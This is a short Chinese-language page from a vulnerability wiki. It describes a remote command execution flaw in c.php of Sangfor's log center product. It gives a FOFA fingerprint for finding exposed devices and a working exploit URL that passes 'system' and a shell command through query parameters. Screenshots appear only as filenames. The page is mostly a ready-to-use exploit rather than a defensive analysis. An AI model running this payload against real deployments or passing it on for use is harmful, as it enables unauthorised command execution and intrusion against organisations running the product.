深信服 日志中心 c.php 远程命令执行漏洞

漏洞描述

深信服 日志中心 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行

漏洞影响

[!NOTE]

深信服 日志中心

FOFA

[!NOTE]

body="isHighPerformance : !!SFIsHighPerformance,"

漏洞复现

登录页面如下

image-20210531192407444

访问漏洞Url

/tool/log/c.php?strip_slashes=system&host=ipconfig

image-20210531192540462

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-31 19:54:37

results matching ""

    No results matching ""